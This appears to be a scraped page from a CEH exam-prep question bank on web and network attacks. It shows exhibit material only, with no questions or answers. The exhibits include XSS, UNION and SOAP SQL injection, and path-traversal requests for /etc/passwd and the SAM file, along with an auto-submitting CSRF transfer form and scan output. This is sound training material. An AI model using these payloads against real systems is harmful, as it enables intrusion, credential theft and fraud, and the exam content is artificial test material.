Question 1mediummultiple choice
Read the full Network and Web Application Attacks explanation →CEH Network and Web Application Attacks • Complete Question Bank
Complete CEH Network and Web Application Attacks question bank — all 0 questions with answers and detailed explanations.
Refer to the exhibit.
GET /search?q=<script>alert('XSS')</script> HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0
HTTP/1.1 200 OK
Content-Type: text/html
<html><body>You searched for: <script>alert('XSS')</script></body></html>Refer to the exhibit. GET /search?q=1 UNION SELECT username,password FROM users-- HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 12:00:00 GMT Server: Apache/2.4.41 (Ubuntu) Content-Type: text/html <html><body><h1>Search Results</h1><p>admin:5f4dcc3b5aa765d61d8327deb882cf99</p><p>user1:5d41402abc4b2a76b9719d911017c592</p></body></html>
Drag steps to the numbered slots on the right, or tap a step then tap a slot.
Drag a concept onto its matching description — or click a concept then click the description.
Symmetric encryption
Asymmetric encryption
Hash function (broken)
Hash function (secure)
Symmetric encryption (deprecated)
C:\Users\admin>netstat -ano | findstr :80 TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 1234 TCP 10.1.1.5:443 10.2.2.3:54321 ESTABLISHED 5678 TCP 10.1.1.5:443 10.2.2.4:12345 TIME_WAIT 0 TCP 10.1.1.5:443 10.2.2.5:9876 ESTABLISHED 5678 C:\Users\admin>tasklist | findstr 5678 pid.exe 5678 Console 1 2,456 K
[Apache access log] 192.168.1.10 - - [20/Jan/2023:10:15:30 +0000] "GET /index.php?page=../../etc/passwd HTTP/1.1" 200 2345 192.168.1.10 - - [20/Jan/2023:10:15:31 +0000] "GET /index.php?page=../../windows/system32/config/sam HTTP/1.1" 200 1234 192.168.1.10 - - [20/Jan/2023:10:15:32 +0000] "GET /index.php?page=admin.php HTTP/1.1" 200 567
HTTP/1.1 302 Found Location: http://www.legitimatebank.com/login.php Set-Cookie: sessionid=abc123; HttpOnly; Secure HTTP/1.1 200 OK Content-Type: text/html <html> <body> <form action="http://www.legitimatebank.com/transfer.php" method="POST"> <input type="hidden" name="toAccount" value="attacker123"> <input type="hidden" name="amount" value="10000"> </form> <script>document.forms[0].submit();</script> </body> </html>
nmap -sV -p 80,443,3306 192.168.1.100 Starting Nmap 7.80 ( https://nmap.org ) at 2023-01-20 10:30 Nmap scan report for 192.168.1.100 Host is up (0.0012s latency). PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.49 443/tcp open ssl/http Apache httpd 2.4.49 3306/tcp open mysql MySQL 5.7.35
<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<getUserInfo>
<userId>1 OR 1=1</userId>
</getUserInfo>
</soap:Body>
</soap:Envelope>
Response:
<soap:Envelope>
<soap:Body>
<getUserInfoResponse>
<user>
<id>1</id>
<name>admin</name>
<email>admin@test.com</email>
</user>
<user>
<id>2</id>
<name>user</name>
<email>user@test.com</email>
</user>
</getUserInfoResponse>
</soap:Body>
</soap:Envelope>